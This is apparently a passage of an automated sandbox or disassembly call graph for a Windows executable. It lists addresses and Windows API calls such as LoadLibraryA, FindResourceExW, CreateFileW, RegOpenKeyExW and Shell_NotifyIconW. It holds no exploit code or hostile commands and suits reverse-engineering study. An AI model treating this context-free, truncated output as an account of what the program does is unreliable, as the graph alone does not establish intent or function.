684aaf 22 API calls 87382->87385 87384 68493d 87383->87384 87386 68c117 41 API calls 87384->87386 87387 6c3900 87385->87387 87390 68494c 87386->87390 87388 6858e5 24 API calls 87387->87388 87389 6c3926 87388->87389 87391 684aaf 22 API calls 87389->87391 87393 68c25d 22 API calls 87390->87393 87392 6c3932 87391->87392 87394 68c1c3 22 API calls 87392->87394 87395 68496a 87393->87395 87396 6c3940 87394->87396 87541 684aaf 87395->87541 87398 684aaf 22 API calls 87396->87398 87400 6c394f 87398->87400 87405 68c1c3 22 API calls 87400->87405 87402 684984 87402->87376 87403 68498e 87402->87403 87404 6a49b8 _strftime 40 API calls 87403->87404 87406 684999 87404->87406 87407 6c3965 87405->87407 87406->87382 87408 6849a3 87406->87408 87409 684aaf 22 API calls 87407->87409 87410 6a49b8 _strftime 40 API calls 87408->87410 87411 6c3972 87409->87411 87412 6849ae 87410->87412 87412->87387 87413 6849b8 87412->87413 87414 6a49b8 _strftime 40 API calls 87413->87414 87416 6849c3 87414->87416 87415 684a07 87415->87400 87417 684a13 87415->87417 87416->87415 87418 684aaf 22 API calls 87416->87418 87417->87411 87557 687d93 87417->87557 87420 6849ea 87418->87420 87422 68c1c3 22 API calls 87420->87422 87424 6849f8 87422->87424 87426 684aaf 22 API calls 87424->87426 87426->87415 87428 68890f 22 API calls 87430 684a4c 87428->87430 87429 688a30 23 API calls 87429->87430 87430->87428 87430->87429 87431 684a90 87430->87431 87432 684aaf 22 API calls 87430->87432 87431->87303 87432->87430 87434 68481b __wsopen_s 87433->87434 87435 6c380d ___scrt_fastfail 87434->87435 87436 684834 87434->87436 87438 6c3829 GetOpenFileNameW 87435->87438 87944 68592d 87436->87944 87441 6c3878 87438->87441 87443 6884e7 22 API calls 87441->87443 87445 6c388d 87443->87445 87445->87445 87446 684852 87972 686328 87446->87972 87450 683708 __wsopen_s 87449->87450 88204 685ce6 87450->88204 87452 68370d 87453 683787 87452->87453 88215 683c08 82 API calls 87452->88215 87453->87310 87455 68371a 87455->87453 88216 683a6d 84 API calls 87455->88216 87457 683723 87457->87453 87458 683727 GetFullPathNameW 87457->87458 87459 6884e7 22 API calls 87458->87459 87460 683753 87459->87460 87461 6884e7 22 API calls 87460->87461 87462 683760 87461->87462 87463 6c3323 87462->87463 87464 6884e7 22 API calls 87462->87464 87464->87453 88256 6846ff 7 API calls 87465->88256 87467 684555 87468 68468e CreateWindowExW CreateWindowExW ShowWindow ShowWindow 87467->87468 87468->87325 87470 6856ed ___scrt_fastfail 87469->87470 88257 686092 87470->88257 87473 685773 87475 6c40bd Shell_NotifyIconW 87473->87475 87476 685791 Shell_NotifyIconW 87473->87476 88261 6857ae 87476->88261 87478 6857a7 87478->87332 87479->87331 87480->87310 87481->87321 87483 6c1ef0 __wsopen_s 87482->87483 87484 6858f2 GetModuleFileNameW 87483->87484 87485 68b606 22 API calls 87484->87485 87486 685918 87485->87486 87487 68592d 23 API calls 87486->87487 87488 685922 87487->87488 87488->87327 87490 6c3e1a 87489->87490 87491 6852ce 87489->87491 87492 69fd5b 22 API calls 87490->87492 88284 6852df 87491->88284 87494 6c3e24 _wcslen 87492->87494 87496 69fd8b 22 API calls 87494->87496 87495 6852d9 87495->87343 87497 6c3e5d __fread_nolock 87496->87497 87499 686492 __wsopen_s 87498->87499 87500 6884e7 22 API calls 87499->87500 87501 6864c4 87499->87501 87500->87501 87511 6864fa 87501->87511 87611 68660f 87501->87611 87503 68b606 22 API calls 87505 6865f4 87503->87505 87504 68b606 22 API calls 87504->87511 87507 686aff 22 API calls 87505->87507 87506 68660f 22 API calls 87506->87511 87509 686600 87507->87509 87509->87358 87510 6865cb 87510->87503 87510->87509 87511->87504 87511->87506 87511->87510 87614 686aff 87511->87614 87620 686832 LoadLibraryA 87512->87620 87517 6c487c 87519 6868db 68 API calls 87517->87519 87518 686898 LoadLibraryExW 87628 6867fb LoadLibraryA 87518->87628 87521 6c4883 87519->87521 87523 6867fb 3 API calls 87521->87523 87525 6c488b 87523->87525 87650 686a95 87525->87650 87526 6868c2 87526->87525 87527 6868ce 87526->87527 87528 6868db 68 API calls 87527->87528 87530 6848d0 87528->87530 87530->87365 87530->87366 87533 6c48b2 87535 69fd5b 22 API calls 87534->87535 87536 6848fa 87535->87536 87536->87377 87538 68c122 87537->87538 87539 68c151 87538->87539 87793 68c28f 41 API calls 87538->87793 87539->87381 87542 684ab9 87541->87542 87543 684ad7 87541->87543 87544 684976 87542->87544 87546 68c1c3 22 API calls 87542->87546 87545 6884e7 22 API calls 87543->87545 87547 6a49b8 87544->87547 87545->87544 87546->87544 87548 6a4a3b 87547->87548 87549 6a49c6 87547->87549 87796 6a4a4d 40 API calls 3 library calls 87548->87796 87556 6a49eb 87549->87556 87794 6af269 20 API calls _abort 87549->87794 87552 6a4a48 87552->87402 87553 6a49d2 87795 6b277c 26 API calls pre_c_initialization 87553->87795 87555 6a49dd 87555->87402 87556->87402 87558 687d9b 87557->87558 87559 69fd5b 22 API calls 87558->87559 87560 687da9 87559->87560 87797 6883b0 87560->87797 87563 6883e0 87800 68c910 87563->87800 87565 69fd8b 22 API calls 87567 684a31 87565->87567 87566 6883f0 87566->87565 87566->87567 87568 688a30 87567->87568 87569 688a46 87568->87569 87570 6c58e4 87569->87570 87575 688a50 87569->87575 87809 6821a5 22 API calls 87570->87809 87571 6c58f1 87810 68c5e7 23 API calls messages 87571->87810 87574 6c590f 87574->87574 87575->87571 87576 688b64 87575->87576 87578 688b6b 87575->87578 87577 69fd5b 22 API calls 87576->87577 87577->87578 87578->87430 87580 6f2c33 87579->87580 87581 686abf 64 API calls 87580->87581 87582 6f2c47 87581->87582 87811 6f2d84 87582->87811 87585 6f2c5d 87585->87368 87586 686a95 40 API calls 87587 6f2c74 87586->87587 87588 686a95 40 API calls 87587->87588 87589 6f2c84 87588->87589 87590 686a95 40 API calls 87589->87590 87591 6f2c9f 87590->87591 87592 686a95 40 API calls 87591->87592 87593 6f2cba 87592->87593 87594 686abf 64 API calls 87593->87594 87595 6f2cd1 87594->87595 87596 6ae99c ___std_exception_copy 21 API calls 87595->87596 87597 6f2cd8 87596->87597 87598 6ae99c ___std_exception_copy 21 API calls 87597->87598 87599 6f2ce2 87598->87599 87600 686a95 40 API calls 87599->87600 87601 6f2cf6 87600->87601 87602 6f281c 27 API calls 87601->87602 87603 6f2d0c 87602->87603 87603->87585 87817 6f21ec 87603->87817 87606 6868ec 87605->87606 87607 6868e5 87605->87607 87609 6868fb 87606->87609 87610 68690c FreeLibrary 87606->87610 87608 6ae608 67 API calls 87607->87608 87608->87606 87609->87370 87610->87609 87612 68c7c9 22 API calls 87611->87612 87613 68661a 87612->87613 87613->87501 87615 686b0e 87614->87615 87619 686b2f __fread_nolock 87614->87619 87618 69fd8b 22 API calls 87615->87618 87616 69fd5b 22 API calls 87617 686b42 87616->87617 87617->87511 87618->87619 87619->87616 87621 686868 87620->87621 87622 68684a GetProcAddress 87620->87622 87625 6ae57b 87621->87625 87623 68685a 87622->87623 87623->87621 87624 686861 FreeLibrary 87623->87624 87624->87621 87658 6ae4ba 87625->87658 87627 68688c 87627->87517 87627->87518 87629 68682f 87628->87629 87630 686810 GetProcAddress 87628->87630 87633 686920 87629->87633 87631 686820 87630->87631 87631->87629 87632 686828 FreeLibrary 87631->87632 87632->87629 87634 69fd8b 22 API calls 87633->87634 87635 686935 87634->87635 87719 6870c2 87635->87719 87637 686941 __fread_nolock 87638 6c48ca 87637->87638 87639 686a45 87637->87639 87649 68697c 87637->87649 87733 6f2f6b 74 API calls 87638->87733 87722 686122 CreateStreamOnHGlobal 87639->87722 87642 6c48cf 87644 686abf 64 API calls 87642->87644 87643 686a95 40 API calls 87643->87649 87645 6c48f2 87644->87645 87646 686a95 40 API calls 87645->87646 87648 686a0e messages 87646->87648 87648->87526 87649->87642 87649->87643 87649->87648 87728 686abf 87649->87728 87651 686aa7 87650->87651 87654 6c491d 87650->87654 87755 6ae854 87651->87755 87655 6f281c 87776 6f266c 87655->87776 87657 6f2837 87657->87533 87659 6ae4c6 ___BuildCatchObject 87658->87659 87660 6ae4d4 87659->87660 87663 6ae504 87659->87663 87683 6af269 20 API calls _abort 87660->87683 87662 6ae4d9 87684 6b277c 26 API calls pre_c_initialization 87662->87684 87665 6ae509 87663->87665 87666 6ae516 87663->87666 87685 6af269 20 API calls _abort 87665->87685 87675 6b8001 87666->87675 87669 6ae51f 87670 6ae532 87669->87670 87671 6ae525 87669->87671 87687 6ae564 LeaveCriticalSection __fread_nolock 87670->87687 87686 6af269 20 API calls _abort 87671->87686 87673 6ae4e4 __wsopen_s 87673->87627 87676 6b800d ___BuildCatchObject 87675->87676 87688 6b2eee EnterCriticalSection 87676->87688 87678 6b801b 87689 6b809b 87678->87689 87682 6b804c __wsopen_s 87682->87669 87683->87662 87684->87673 87685->87673 87686->87673 87687->87673 87688->87678 87698 6b80be 87689->87698 87690 6b8028 87703 6b8057 87690->87703 87691 6b8117 87708 6b4c0d 20 API calls 2 library calls 87691->87708 87693 6b8120 87709 6b2958 87693->87709 87696 6b8129 87696->87690 87715 6b3395 11 API calls 2 library calls 87696->87715 87698->87690 87698->87691 87706 6a911d EnterCriticalSection 87698->87706 87707 6a9131 LeaveCriticalSection 87698->87707 87699 6b8148 87716 6a911d EnterCriticalSection 87699->87716 87702 6b815b 87702->87690 87718 6b2f36 LeaveCriticalSection 87703->87718 87705 6b805e 87705->87682 87706->87698 87707->87698 87708->87693 87710 6b2963 RtlFreeHeap 87709->87710 87714 6b298c _free 87709->87714 87711 6b2978 87710->87711 87710->87714 87717 6af269 20 API calls _abort 87711->87717 87713 6b297e GetLastError 87713->87714 87714->87696 87715->87699 87716->87702 87717->87713 87718->87705 87720 69fd5b 22 API calls 87719->87720 87721 6870d4 87720->87721 87721->87637 87723 686159 87722->87723 87724 68613c FindResourceExW 87722->87724 87723->87649 87724->87723 87725 6c42f1 LoadResource 87724->87725 87725->87723 87726 6c4306 SizeofResource 87725->87726 87726->87723 87727 6c431a LockResource 87726->87727 87727->87723 87729 6c493d 87728->87729 87730 686ace 87728->87730 87734 6aec73 87730->87734 87733->87642 87737 6aea3a 87734->87737 87736 686adc 87736->87649 87740 6aea46 ___BuildCatchObject 87737->87740 87738 6aea52 87750 6af269 20 API calls _abort 87738->87750 87739 6aea78 87752 6a911d EnterCriticalSection 87739->87752 87740->87738 87740->87739 87743 6aea57 87751 6b277c 26 API calls pre_c_initialization 87743->87751 87745 6aea84 87753 6aeb9a 62 API calls 2 library calls 87745->87753 87747 6aea98 87754 6aeab7 LeaveCriticalSection __fread_nolock 87747->87754 87749 6aea62 __wsopen_s 87749->87736 87750->87743 87751->87749 87752->87745 87753->87747 87754->87749 87758 6ae871 87755->87758 87757 686ab8 87757->87655 87759 6ae87d ___BuildCatchObject 87758->87759 87760 6ae8bd 87759->87760 87761 6ae890 ___scrt_fastfail 87759->87761 87762 6ae8b5 __wsopen_s 87759->87762 87773 6a911d EnterCriticalSection 87760->87773 87771 6af269 20 API calls _abort 87761->87771 87762->87757 87764 6ae8c7 87774 6ae688 38 API calls 4 library calls 87764->87774 87767 6ae8aa 87772 6b277c 26 API calls pre_c_initialization 87767->87772 87768 6ae8de 87775 6ae8fc LeaveCriticalSection __fread_nolock 87768->87775 87771->87767 87772->87762 87773->87764 87774->87768 87775->87762 87779 6ae478 87776->87779 87778 6f267b 87778->87657 87782 6ae3f9 87779->87782 87781 6ae495 87781->87778 87783 6ae408 87782->87783 87784 6ae41c 87782->87784 87790 6af269 20 API calls _abort 87783->87790 87789 6ae418 __alldvrm 87784->87789 87792 6b32cf 11 API calls 2 library calls 87784->87792 87786 6ae40d 87791 6b277c 26 API calls pre_c_initialization 87786->87791 87789->87781 87790->87786 87791->87789 87792->87789 87793->87539 87794->87553 87795->87555 87796->87552 87798 69fd5b 22 API calls 87797->87798 87799 684a23 87798->87799 87799->87563 87801 68c91b 87800->87801 87802 6d0728 87801->87802 87807 68c923 messages 87801->87807 87803 69fd5b 22 API calls 87802->87803 87806 6d0734 87803->87806 87804 68c92a 87804->87566 87806->87806 87807->87804 87808 68c990 22 API calls messages 87807->87808 87808->87807 87809->87571 87810->87574 87814 6f2d98 87811->87814 87812 6f281c 27 API calls 87812->87814 87813 6f2c59 87813->87585 87813->87586 87814->87812 87814->87813 87815 686a95 40 API calls 87814->87815 87816 686abf 64 API calls 87814->87816 87815->87814 87816->87814 87818 6f21f7 87817->87818 87819 6f2205 87817->87819 87820 6ae57b 29 API calls 87818->87820 87821 6f224a 87819->87821 87822 6ae57b 29 API calls 87819->87822 87845 6f220e 87819->87845 87820->87819 87846 6f2475 40 API calls __fread_nolock 87821->87846 87824 6f222f 87822->87824 87824->87821 87826 6f2238 87824->87826 87825 6f228e 87827 6f22b3 87825->87827 87828 6f2292 87825->87828 87826->87845 87854 6ae608 87826->87854 87847 6f208f 87827->87847 87829 6f229f 87828->87829 87832 6ae608 67 API calls 87828->87832 87836 6ae608 67 API calls 87829->87836 87829->87845 87832->87829 87833 6f22bb 87834 6f22e1 87833->87834 87835 6f22c1 87833->87835 87867 6f2311 74 API calls 87834->87867 87837 6f22ce 87835->87837 87839 6ae608 67 API calls 87835->87839 87836->87845 87840 6ae608 67 API calls 87837->87840 87837->87845 87839->87837 87840->87845 87841 6f22fc 87844 6ae608 67 API calls 87841->87844 87841->87845 87842 6f22e8 87842->87841 87843 6ae608 67 API calls 87842->87843 87843->87841 87844->87845 87845->87585 87846->87825 87848 6ae99c ___std_exception_copy 21 API calls 87847->87848 87849 6f209d 87848->87849 87850 6ae99c ___std_exception_copy 21 API calls 87849->87850 87851 6f20ae 87850->87851 87852 6ae99c ___std_exception_copy 21 API calls 87851->87852 87853 6f20ba 87852->87853 87853->87833 87855 6ae614 ___BuildCatchObject 87854->87855 87856 6ae63a 87855->87856 87857 6ae625 87855->87857 87865 6ae635 __wsopen_s 87856->87865 87868 6a911d EnterCriticalSection 87856->87868 87885 6af269 20 API calls _abort 87857->87885 87860 6ae62a 87886 6b277c 26 API calls pre_c_initialization 87860->87886 87861 6ae656 87869 6ae592 87861->87869 87864 6ae661 87887 6ae67e LeaveCriticalSection __fread_nolock 87864->87887 87865->87845 87867->87842 87868->87861 87870 6ae59f 87869->87870 87871 6ae5b4 87869->87871 87920 6af269 20 API calls _abort 87870->87920 87877 6ae5af 87871->87877 87888 6adb9b 87871->87888 87873 6ae5a4 87921 6b277c 26 API calls pre_c_initialization 87873->87921 87877->87864 87881 6ae5d6 87905 6b85cf 87881->87905 87884 6b2958 _free 20 API calls 87884->87877 87885->87860 87886->87865 87887->87865 87889 6adbb3 87888->87889 87890 6adbaf 87888->87890 87889->87890 87891 6ad8e5 __fread_nolock 26 API calls 87889->87891 87894 6b4d0a 87890->87894 87892 6adbd3 87891->87892 87922 6b594e 62 API calls 5 library calls 87892->87922 87895 6b4d20 87894->87895 87896 6ae5d0 87894->87896 87895->87896 87897 6b2958 _free 20 API calls 87895->87897 87898 6ad8e5 87896->87898 87897->87896 87899 6ad8f1 87898->87899 87900 6ad906 87898->87900 87923 6af269 20 API calls _abort 87899->87923 87900->87881 87902 6ad8f6 87924 6b277c 26 API calls pre_c_initialization 87902->87924 87904 6ad901 87904->87881 87906 6b85de 87905->87906 87907 6b85f3 87905->87907 87928 6af256 20 API calls _abort 87906->87928 87909 6b862e 87907->87909 87914 6b861a 87907->87914 87930 6af256 20 API calls _abort 87909->87930 87911 6b85e3 87929 6af269 20 API calls _abort 87911->87929 87912 6b8633 87931 6af269 20 API calls _abort 87912->87931 87925 6b85a7 87914->87925 87917 6ae5dc 87917->87877 87917->87884 87918 6b863b 87932 6b277c 26 API calls pre_c_initialization 87918->87932 87920->87873 87921->87877 87922->87890 87923->87902 87924->87904 87933 6b8525 87925->87933 87927 6b85cb 87927->87917 87928->87911 87929->87917 87930->87912 87931->87918 87932->87917 87934 6b8531 ___BuildCatchObject 87933->87934 87935 6b50d7 __wsopen_s EnterCriticalSection 87934->87935 87936 6b853f 87935->87936 87937 6b8571 87936->87937 87938 6b8566 87936->87938 87940 6af269 _free 20 API calls 87937->87940 87939 6b864e __wsopen_s 29 API calls 87938->87939 87941 6b856c 87939->87941 87940->87941 87942 6b859b LeaveCriticalSection 87941->87942 87943 6b858e __wsopen_s 87942->87943 87943->87927 88002 6c1ef0 87944->88002 87947 685959 87949 6884e7 22 API calls 87947->87949 87948 685974 88004 68bfbf 87948->88004 87951 685965 87949->87951 87952 68562b 22 API calls 87951->87952 87953 68483d 87952->87953 87954 6847d0 87953->87954 87955 6c1ef0 __wsopen_s 87954->87955 87956 6847dd GetLongPathNameW 87955->87956 87957 6884e7 22 API calls 87956->87957 87958 684805 87957->87958 87959 685489 87958->87959 87960 68c25d 22 API calls 87959->87960 87961 68549b 87960->87961 87962 68592d 23 API calls 87961->87962 87963 6854a6 87962->87963 87964 6854b1 87963->87964 87969 6c404a 87963->87969 87965 686aff 22 API calls 87964->87965 87967 6854bd 87965->87967 88010 68285a 87967->88010 87970 6c406c 87969->87970 88016 69d5dc 41 API calls 87969->88016 87971 6854d0 87971->87446 87973 68686d 94 API calls 87972->87973 87974 68634d 87973->87974 87975 6c456a 87974->87975 87977 68686d 94 API calls 87974->87977 87976 6f2c17 80 API calls 87975->87976 87978 6c457f 87976->87978 87979 686361 87977->87979 87980 6c45a0 87978->87980 87981 6c4583 87978->87981 87979->87975 87982 686369 87979->87982 87984 69fd8b 22 API calls 87980->87984 87983 6868db 68 API calls 87981->87983 87985 6c458b 87982->87985 87986 686375 87982->87986 87983->87985 88001 6c45e5 87984->88001 88142 6ed978 82 API calls 87985->88142 88017 68ad7c 87986->88017 87989 6c4599 87989->87980 87990 6844e2 87990->87310 87990->87312 87991 6c4796 87996 6c479e 87991->87996 87992 6868db 68 API calls 87992->87996 87996->87992 88144 6e97b9 82 API calls __wsopen_s 87996->88144 87998 68b606 22 API calls 87998->88001 88001->87991 88001->87996 88001->87998 88119 6e959c 88001->88119 88122 6f0a78 88001->88122 88128 68bd9d 88001->88128 88136 685e82 88001->88136 88143 6e94cb 42 API calls _wcslen 88001->88143 88003 68593a GetFullPathNameW 88002->88003 88003->87947 88003->87948 88005 68bfd9 88004->88005 88006 68bfcc 88004->88006 88007 69fd5b 22 API calls 88005->88007 88006->87951 88008 68bfe3 88007->88008 88009 69fd8b 22 API calls 88008->88009 88009->88006 88011 68288b __fread_nolock 88010->88011 88012 68286c 88010->88012 88013 69fd5b 22 API calls 88011->88013 88014 69fd8b 22 API calls 88012->88014 88015 6828a2 88013->88015 88014->88011 88015->87971 88016->87969 88018 6cf9b1 88017->88018 88019 68ada5 88017->88019 88181 6e97b9 82 API calls __wsopen_s 88018->88181 88020 69fd8b 22 API calls 88019->88020 88022 68adc9 88020->88022 88024 687bee CloseHandle 88022->88024 88023 6cf9c4 88029 68ae2f 88023->88029 88025 68add7 88024->88025 88026 68c25d 22 API calls 88025->88026 88028 68ade0 88026->88028 88027 68ae3d 88030 68c25d 22 API calls 88027->88030 88031 687bee CloseHandle 88028->88031 88029->88027 88182 6ecc1d 88029->88182 88032 68ae49 88030->88032 88034 68ade9 88031->88034 88145 69f962 88032->88145 88036 687bee CloseHandle 88034->88036 88038 68adf2 88036->88038 88163 6870e5 88038->88163 88039 68c25d 22 API calls 88041 68ae61 88039->88041 88043 68592d 23 API calls 88041->88043 88047 68ae6f 88043->88047 88044 6cfde7 88194 6e97b9 82 API calls __wsopen_s 88044->88194 88045 68ae14 88171 686d7e 27 API calls messages 88045->88171 88150 69f945 88047->88150 88048 6cfdfc 88048->88048 88052 68ae26 88172 686d67 SetFilePointerEx SetFilePointerEx SetFilePointerEx 88052->88172 88056 68aeb2 88057 68c25d 22 API calls 88056->88057 88059 68aebb 88057->88059 88058 6cfa3d 88060 687bee CloseHandle 88058->88060 88061 68c25d 22 API calls 88059->88061 88062 6cfa46 88060->88062 88063 68aec4 88061->88063 88064 68686d 94 API calls 88062->88064 88173 686bff 22 API calls 88063->88173 88066 6cfa6e 88064->88066 88068 6cfd7e 88066->88068 88069 6f2c17 80 API calls 88066->88069 88067 68aedb 88070 687cf8 22 API calls 88067->88070 88191 6e97b9 82 API calls __wsopen_s 88068->88191 88072 6cfa91 88069->88072 88073 68aeec SetCurrentDirectoryW 88070->88073 88074 6868db 68 API calls 88072->88074 88078 68aeff 88073->88078 88075 6cfa9f 88074->88075 88075->88068 88076 6cfaa7 88075->88076 88077 69fd5b 22 API calls 88076->88077 88081 6cfacf 88077->88081 88080 69fd8b 22 API calls 88078->88080 88079 68b058 messages 88159 687bee 88079->88159 88083 68af12 88080->88083 88086 68bd9d 22 API calls 88081->88086 88084 6870c2 22 API calls 88083->88084 88114 68af1d _wcslen 88084->88114 88085 68b08a 88087 687bee CloseHandle 88085->88087 88115 6cfb10 88086->88115 88091 68b09c 88087->88091 88088 68b035 88090 687bee CloseHandle 88088->88090 88089 6cfceb 88188 6f09ea 22 API calls 88089->88188 88093 68b03e SetCurrentDirectoryW 88090->88093 88091->87990 88093->88079 88096 6cfd11 88189 6e40c5 22 API calls __fread_nolock 88096->88189 88098 68bd9d 22 API calls 88098->88115 88100 6cfdca 88193 6e97b9 82 API calls __wsopen_s 88100->88193 88104 6cfdde 88104->88088 88105 6e959c 22 API calls 88105->88115 88108 68b606 22 API calls 88108->88114 88109 68b606 22 API calls 88109->88115 88111 6f0a78 22 API calls 88111->88115 88113 6cfd53 88190 6e97b9 82 API calls __wsopen_s 88113->88190 88114->88088 88114->88100 88114->88108 88174 68b0d9 33 API calls 88114->88174 88175 688fd0 GetStringTypeW 88114->88175 88176 68901d 40 API calls 88114->88176 88177 6890bd GetStringTypeW _wcslen 88114->88177 88178 6a6355 GetStringTypeW _strftime 88114->88178 88179 6890f8 136 API calls 2 library calls 88114->88179 88180 688f2c 22 API calls 88114->88180 88192 6e9464 22 API calls _wcslen 88114->88192 88115->88089 88115->88098 88115->88105 88115->88109 88115->88111 88115->88113 88186 6e94cb 42 API calls _wcslen 88115->88186 88187 688f2c 22 API calls 88115->88187 88117 6cfd6c 88117->88079 88120 69fd8b 22 API calls 88119->88120 88121 6e95cc __fread_nolock 88120->88121 88121->88001 88121->88121 88123 6f0a83 88122->88123 88124 69fd5b 22 API calls 88123->88124 88125 6f0a9a 88124->88125 88126 68b606 22 API calls 88125->88126 88127 6f0aa5 88126->88127 88127->88001 88129 68be27 88128->88129 88134 68bdad __fread_nolock 88128->88134 88131 69fd8b 22 API calls 88129->88131 88130 69fd5b 22 API calls 88132 68bdb4 88130->88132 88131->88134 88133 69fd5b 22 API calls 88132->88133 88135 68bdd2 88132->88135 88133->88135 88134->88130 88135->88001 88138 685e95 88136->88138 88140 685f39 88136->88140 88137 685ec7 88137->88140 88141 69fd5b 22 API calls 88137->88141 88138->88137 88139 69fd8b 22 API calls 88138->88139 88139->88137 88140->88001 88141->88137 88142->87989 88143->88001 88144->87996 88146 6c1ef0 __wsopen_s 88145->88146 88147 69f96f GetCurrentDirectoryW 88146->88147 88148 6884e7 22 API calls 88147->88148 88149 68ae55 88148->88149 88149->88039 88195 68b3b0 88150->88195 88153 686e66 88158 686e7d 88153->88158 88154 6c4b49 SetFilePointerEx 88155 686f04 SetFilePointerEx SetFilePointerEx 88156 686ed0 88155->88156 88156->88056 88156->88058 88157 6c4b38 88157->88154 88158->88154 88158->88155 88158->88156 88158->88157 88160 687bf8 88159->88160 88161 687c07 88159->88161 88160->88085 88161->88160 88162 687c0c CloseHandle 88161->88162 88162->88160 88164 6870fc CreateFileW 88163->88164 88165 6c4be2 88163->88165 88166 68711b 88164->88166 88165->88166 88167 6c4be8 CreateFileW 88165->88167 88166->88044 88166->88045 88167->88166 88168 6c4c10 88167->88168 88169 686e66 3 API calls 88168->88169 88170 6c4c1b 88169->88170 88170->88166 88171->88052 88172->88029 88173->88067 88174->88114 88175->88114 88176->88114 88177->88114 88178->88114 88179->88114 88180->88114 88181->88023 88183 6ecc2c 88182->88183 88184 6ecc37 WriteFile 88182->88184 88203 6ecb55 SetFilePointerEx SetFilePointerEx SetFilePointerEx 88183->88203 88184->88027 88186->88115 88187->88115 88188->88096 88189->88079 88190->88117 88191->88117 88192->88114 88193->88104 88194->88048 88196 68b42b 88195->88196 88197 68b3be 88195->88197 88202 69e3db SetFilePointerEx 88196->88202 88198 68ae95 88197->88198 88200 68b3fc ReadFile 88197->88200 88198->88153 88200->88198 88201 68b416 88200->88201 88201->88197 88201->88198 88202->88197 88203->88184 88205 685d0d 88204->88205 88206 685e2a 88204->88206 88205->88206 88207 69fd8b 22 API calls 88205->88207 88206->87452 88208 685d34 88207->88208 88209 69fd8b 22 API calls 88208->88209 88214 685da9 88209->88214 88210 685e82 22 API calls 88210->88214 88213 68bd9d 22 API calls 88213->88214 88214->88206 88214->88210 88214->88213 88217 68b7e0 88214->88217 88244 6f0977 22 API calls 88214->88244 88215->87455 88216->87457 88245 687c18 88217->88245 88219 68ba28 88220 68bd9d 22 API calls 88219->88220 88221 68ba42 88220->88221 88221->88214 88224 6d036d __fread_nolock 88227 6d039f 88224->88227 88229 68bd03 88224->88229 88225 68bd9d 22 API calls 88238 68b805 88225->88238 88226 6d0312 88233 69fd5b 22 API calls 88226->88233 88254 6e9600 84 API calls __wsopen_s 88227->88254 88229->88221 88255 6e9600 84 API calls __wsopen_s 88229->88255 88231 68bfbf 22 API calls 88231->88238 88235 6d0333 88233->88235 88234 6d03ad 88236 68bd9d 22 API calls 88234->88236 88239 69fd8b 22 API calls 88235->88239 88237 6d03c3 88236->88237 88237->88221 88238->88219 88238->88224 88238->88225 88238->88226 88238->88227 88238->88229 88238->88231 88240 68be83 22 API calls 88238->88240 88241 68c7c9 22 API calls 88238->88241 88250 684df1 41 API calls _wcslen 88238->88250 88251 68bf6f 22 API calls 88238->88251 88252 6850f7 23 API calls 88238->88252 88253 6851ec 22 API calls __fread_nolock 88238->88253 88239->88224 88240->88238 88243 68b9f9 CharUpperBuffW 88241->88243 88243->88238 88244->88214 88246 69fd8b 22 API calls 88245->88246 88247 687c3d 88246->88247 88248 69fd5b 22 API calls 88247->88248 88249 687c4b 88248->88249 88249->88238 88250->88238 88251->88238 88252->88238 88253->88238 88254->88234 88255->88221 88256->87467 88258 6c42db 88257->88258 88259 685742 88257->88259 88258->88259 88260 6c42e4 DestroyIcon 88258->88260 88259->87473 88283 6ec792 42 API calls _strftime 88259->88283 88260->88259 88262 6857ca 88261->88262 88263 68589e 88261->88263 88264 687c18 22 API calls 88262->88264 88263->87478 88265 6857d8 88264->88265 88266 6c40ca LoadStringW 88265->88266 88267 6857e5 88265->88267 88269 6c40e4 88266->88269 88268 6884e7 22 API calls 88267->88268 88270 6857fa 88268->88270 88273 68c1c3 22 API calls 88269->88273 88278 68581f ___scrt_fastfail 88269->88278 88271 6c4100 88270->88271 88272 685807 88270->88272 88275 687cf8 22 API calls 88271->88275 88272->88269 88274 685811 88272->88274 88273->88278 88276 687cf8 22 API calls 88274->88276 88277 6c410e 88275->88277 88276->88278 88277->88278 88279 6852b7 22 API calls 88277->88279 88280 685884 Shell_NotifyIconW 88278->88280 88281 6c4130 88279->88281 88280->88263 88282 6852b7 22 API calls 88281->88282 88282->88278 88283->87473 88285 6852ef _wcslen 88284->88285 88286 6c3e7c 88285->88286 88287 685302 88285->88287 88289 69fd5b 22 API calls 88286->88289 88288 68be83 22 API calls 88287->88288 88290 68530f __fread_nolock 88288->88290 88291 6c3e86 88289->88291 88290->87495 88292 69fd8b 22 API calls 88291->88292 88293 6c3eb6 __fread_nolock 88292->88293 88294 68105b 88299 68533e 88294->88299 88296 68106a 88330 6a0023 29 API calls __onexit 88296->88330 88298 681074 88300 68534e __wsopen_s 88299->88300 88301 68c25d 22 API calls 88300->88301 88302 685404 88301->88302 88303 6858e5 24 API calls 88302->88303 88304 68540d 88303->88304 88331 684d82 88304->88331 88307 6852b7 22 API calls 88308 685426 88307->88308 88309 686aff 22 API calls 88308->88309 88310 685435 88309->88310 88311 68c25d 22 API calls 88310->88311 88312 68543e 88311->88312 88313 68bfbf 22 API calls 88312->88313 88314 685447 RegOpenKeyExW 88313->88314 88315 6c3ed5 RegQueryValueExW 88314->88315 88320 685469 88314->88320 88316 6c3f6b RegCloseKey 88315->88316 88317 6c3ef2 88315->88317 88316->88320 88328 6c3f7d _wcslen 88316->88328 88318 69fd8b 22 API calls 88317->88318 88319 6c3f0b 88318->88319 88321 6870c2 22 API calls 88319->88321 88320->88296 88322 6c3f16 RegQueryValueExW 88321->88322 88323 6c3f33 88322->88323 88325 6c3f4d messages 88322->88325 88324 6884e7 22 API calls 88323->88324 88324->88325 88325->88316 88326 68b606 22 API calls 88326->88328 88327 686aff 22 API calls 88327->88328 88328->88320 88328->88326 88328->88327 88329 68660f 22 API calls 88328->88329 88329->88328 88330->88298 88332 6c1ef0 __wsopen_s 88331->88332 88333 684d8f GetFullPathNameW 88332->88333 88334 684db1 88333->88334 88335 6884e7 22 API calls 88334->88335 88336 684dcf 88335->88336 88336->88307 88337 6910bf 88338 6910d3 88337->88338 88339 6915b6 88337->88339 88341 6915c2 88338->88341 88342 69fd5b 22 API calls 88338->88342 88411 68c5e7 23 API calls messages 88339->88411 88412 68c5e7 23 API calls messages 88341->88412 88344 6910e5 88342->88344 88344->88341 88345 69113e 88344->88345 88346 69163d 88344->88346 88353 69064d messages 88345->88353 88358 692c10 88345->88358 88413 6f1073 22 API calls 88346->88413 88349 690cae 88417 6f34ba 82 API calls __wsopen_s 88349->88417 88350 68c1c3 22 API calls 88355 6905f4 messages 88350->88355 88354 68c25d 22 API calls 88354->88355 88355->88349 88355->88350 88355->88353 88355->88354 88414 6a01c2 5 API calls __Init_thread_wait 88355->88414 88415 6a0023 29 API 